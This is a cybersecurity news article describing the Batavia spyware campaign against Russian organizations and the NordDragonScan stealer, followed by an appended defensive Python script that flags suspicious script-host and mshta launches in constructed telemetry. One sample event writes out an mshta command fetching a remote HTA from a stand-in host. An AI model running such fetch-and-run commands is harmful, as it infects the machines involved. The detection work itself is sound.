Researchers reveal Batavia Windows spyware stealing documents from Russian companies

July 8, 2025Ravi LakshmananCyber ​​Spy/Threat Intelligence

Batavia Windows Spyware

Russian organizations are being targeted as part of an ongoing campaign that delivers a previously undocumented Windows spyware called Batavia.

According to cybersecurity vendor Kaspersky, the activity has been ongoing since July 2024.

“Targeted attacks start with bait emails containing malicious links sent under the pretext of signing a contract,” the Russian company said. “The main goal of the attack is to infect your organization with previously unknown Batavia spyware, which steals internal documents.”

The email messages are sent from the domain[.]com, which is said to be owned by the attacker. Links embedded in the messages lead to the download of archive files containing Visual Basic Encoded Script (.VBE) files.

When executed, the script profiles the compromised host and exfiltrates system information to a remote server. This is followed by the retrieval of the next-stage payload from the same server, an executable written in Delphi.

The malware displays a fake contract to the victim as a distraction while, in the background, it collects system logs, office documents (*.doc, *.docx, *.ods, *.odt, *.pdf, *.xls, and *.xlsx) and screenshots. Data collection also extends to removable devices connected to the host.

The Delphi malware is also capable of downloading a further binary from the server, which targets a broader set of file extensions for collection: images, emails, Microsoft PowerPoint presentations, archive files and text documents (*.jpeg, *.jpg, *.cdr, *.csv, *.eml, *.ppt, *.pptx, *.odp, *.rar, *.zip, *.rtf, and *.txt).

The newly collected data is sent to another domain (“ru-exchange[.]com”), from where an unknown executable is downloaded as the fourth stage to continue the attack chain.

Kaspersky’s telemetry data shows that over 100 users from dozens of organizations have received phishing emails over the past year.

“As a result of the attack, Batavia exfiltrates information such as the victim’s documents and listings of installed programs, drivers and operating system components,” the company said.

The disclosure comes as Fortinet FortiGuard Labs detailed a malicious campaign delivering a Windows stealer malware codenamed NordDragonScan. The exact initial access vector is unclear, but it is believed to be a phishing email carrying a link that triggers the download of a RAR archive.

“When NordDragonScan is installed, it examines the host, copies documents, harvests the entire Chrome and Firefox profiles and takes screenshots,” says security researcher Cara Lin.

Residing in the archive is a Windows Shortcut (LNK) file that uses “MSHTA.EXE” to run a remotely hosted HTML Application (HTA). This step opens a benign decoy document while the malicious .NET payload is silently dropped onto the system.

Once launched, the stealer malware establishes a connection with a remote server (“kpuszkievi[.]com”), sets up persistence via changes to the Windows registry, conducts extensive reconnaissance of the compromised machine, collects sensitive data and returns the information to the server via HTTP POST requests.

“The RAR file contains an LNK file that calls MSHTA.EXE to run a malicious HTA script, which displays decoy documents in Ukrainian. NordDragonScan can scan hosts, capture screenshots, extract documents and PDFs, and sniff profiles in Chrome and Firefox.”
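Both chains hinge on a Windows script host being launched from a user-writable path, which is what endpoint telemetry can catch. The following is an added example (not code from the article, Kaspersky or Fortinet) that triages constructed process-creation events for the two indicators described above: a .VBE script (generalized here to the other WSH extensions .JSE and .WSF) run from a freshly unpacked archive, and mshta.exe handed a remote http(s) HTA. The field names, paths and the hta.example.invalid host are assumptions.

```python
"""Triage of constructed process-creation events for the two delivery chains
described in the article. Field names are hypothetical, modelled loosely on a
Sysmon process-create event; every path, host and value below is constructed."""
import re

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\ivan\AppData\Local\Temp\Temp1_contract.zip\dogovor.vbe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://hta.example.invalid/decoy.hta',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",  # benign: local HTA from a vendor tool
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\panel.hta"',
     "parent": r"C:\Program Files\Vendor\agent.exe"},
    {"image": r"C:\Windows\System32\cscript.exe",  # benign: built-in admin script
     "cmdline": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Encoded script (.vbe) and the other WSH container extensions explorer hands to the host.
ENCODED_SCRIPT = re.compile(r"\.(vbe|jse|wsf)\b", re.IGNORECASE)
# mshta followed anywhere on the line by an http(s) URL: a remotely hosted HTA.
REMOTE_HTA = re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.IGNORECASE)
# Locations where an archive opened from a mail link is typically unpacked.
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\local\\")

def triage(event):
    """Return the rule names an event matches; an empty list means no finding."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]
    findings = []
    if (exe in SCRIPT_HOSTS and ENCODED_SCRIPT.search(cmdline)
            and any(p in cmdline.lower() for p in USER_WRITABLE)):
        findings.append("encoded-script-from-user-path")
    if exe == "mshta.exe" and REMOTE_HTA.search(cmdline):
        findings.append("mshta-remote-hta")
    return findings

def triage_all(events):
    """Map event index to its findings, keeping only events that matched a rule."""
    return {i: f for i, f in ((i, triage(e)) for i, e in enumerate(events)) if f}

if __name__ == "__main__":
    for idx, hits in triage_all(SAMPLE_EVENTS).items():
        print(idx, hits, SAMPLE_EVENTS[idx]["cmdline"])
```

The local-HTA and slmgr.vbs events are deliberately included so the rules can be checked against common benign uses of the same binaries.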
